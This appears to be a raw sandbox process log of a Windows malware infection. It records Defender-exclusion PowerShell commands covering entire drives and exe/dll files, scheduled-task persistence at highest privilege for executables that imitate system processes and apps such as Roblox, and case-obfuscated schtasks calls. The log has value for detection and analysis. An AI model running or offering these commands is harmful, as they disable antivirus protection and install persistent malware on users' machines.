C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Offline Web Pages\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Bloxstrap.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\audiodg.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\lsm.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\wscript.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\de-DE\WmiPrvSE.exe'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KAuKjb5uOJ.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\SysWOW64\msiexec.exe

"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\MsiExec.exe

C:\Windows\system32\MsiExec.exe -Embedding 85A41532DC1B4ED986F185DC47A3340F

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 9924FCA711D0C7FDDBC022E9B16DDBDF

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 1548

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\explorer.exe'" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Windows\Downloaded Program Files\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\winNet\lsass.exe'" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\winNet\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\winNet\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\Offline Web Pages\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\Offline Web Pages\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Documents\My Videos\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\Documents\My Videos\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Documents\My Videos\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Microsoft\eHome\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\eHome\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Microsoft\eHome\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Journal\fr-FR\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\fr-FR\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Journal\fr-FR\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\msiexec.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\MSOCache\All Users\msiexec.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\msiexec.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\DriversavessessionDlldhcp\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 7 /tr "'C:\winNet\sddsfsdf.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sddsfsdf" /sc ONLOGON /tr "'C:\winNet\sddsfsdf.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 10 /tr "'C:\winNet\sddsfsdf.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Downloaded Program Files\explorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\lsass.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Offline Web Pages\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Documents\My Videos\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft\eHome\wininit.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Journal\fr-FR\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\msiexec.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\dwm.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\sddsfsdf.exe'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vMNJbUnSbM.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "

C:\winNet\ComContainerbrowserRefRuntime.exe

"C:\winNet/ComContainerbrowserRefRuntime.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9uqqWUlzO4.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "

C:\DriversavessessionDlldhcp\Roblox.exe

"C:\DriversavessessionDlldhcp/Roblox.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\AppData\Local\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\csrss.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4np3pl54\4np3pl54.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D5A.tmp" "c:\winNet\CSCA4C2121C24C74BF895E5B3D597394777.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mbi1aa25\mbi1aa25.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DE7.tmp" "c:\Program Files\Windows Journal\fr-FR\CSCD76AE30457034164B573F4B2A5893960.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lcqkwtqq\lcqkwtqq.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7E54.tmp" "c:\Users\All Users\CSC95C42A624314BE78310BDEB9D835BA3.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mr1ppnnp\mr1ppnnp.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F1F.tmp" "c:\Windows\Offline Web Pages\CSCC2D5E9D23B0A48B6BC6FE4B9ECA6CC38.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cfzenaag\cfzenaag.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F6D.tmp" "c:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\CSC67F9D5D440504062ACE553C19FFDE5E4.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bsormrob\bsormrob.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8028.tmp" "c:\winNet\CSC49D7F72528124E81B41D936BF212C46B.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gjjieqlg\gjjieqlg.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8095.tmp" "c:\winNet\CSC97D079D2907144CEAE72F4F99686E3.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3ho3etse\3ho3etse.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8102.tmp" "c:\winNet\CSC3992B8FD69D44AFFAB9FE267318D8677.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iuv4z3u2\iuv4z3u2.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES816F.tmp" "c:\Users\Admin\Documents\My Videos\CSC228DE5B123194A0D88E81292314E68A3.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\isip5dhu\isip5dhu.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81CD.tmp" "c:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\CSCDD2E6DCB555746B4A413D5CFB027D2AA.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g4bqf3ev\g4bqf3ev.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8259.tmp" "c:\Program Files (x86)\Reference Assemblies\Microsoft\CSCB6ABC6A5FBFC4B328AE5916D92DC1AED.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\24qxckip\24qxckip.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82D6.tmp" "c:\Windows\Downloaded Program Files\CSCE0C07C03540D456BB3309258DBDFE59B.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tggocznb\tggocznb.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8353.tmp" "c:\Users\All Users\Microsoft\eHome\CSC1ACF99C1ED05466F84E5BBE09011CE69.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nb1h5mye\nb1h5mye.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES83D0.tmp" "c:\MSOCache\All Users\CSC12ACF0B35F3F40B39BFE2C5B4089659.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dimtaqxu\dimtaqxu.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES845C.tmp" "c:\DriversavessessionDlldhcp\CSCDB0D1EC529DA4CC8A5904E3928B049D7.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tec2jh3k\tec2jh3k.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84D9.tmp" "c:\winNet\CSC50F968E876B4431CAAFB7131F4B618AD.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hu1aq3rt\hu1aq3rt.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8527.tmp" "c:\Windows\System32\CSC9B65422D45F44341A51A8E825BEAE4A.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 6 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1451802786-450524094-15654959291856616033-8165324015582428211873060891409845559"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1240033177-1087581127-52718330253047587052423637-105435632017827248901758497198"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "434171039490841803-659286136170842003317782336711507689689-864061186-1185069012"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "210418219-5002661294701329731368471238-522211457-8196399031202507616-1462984557"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NNPPtxWawv.bat"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "897362320-41934790-91102571416317546481911294881-9260774479988698511668435757"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"

C:\Windows\system32\CMD.exe

"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

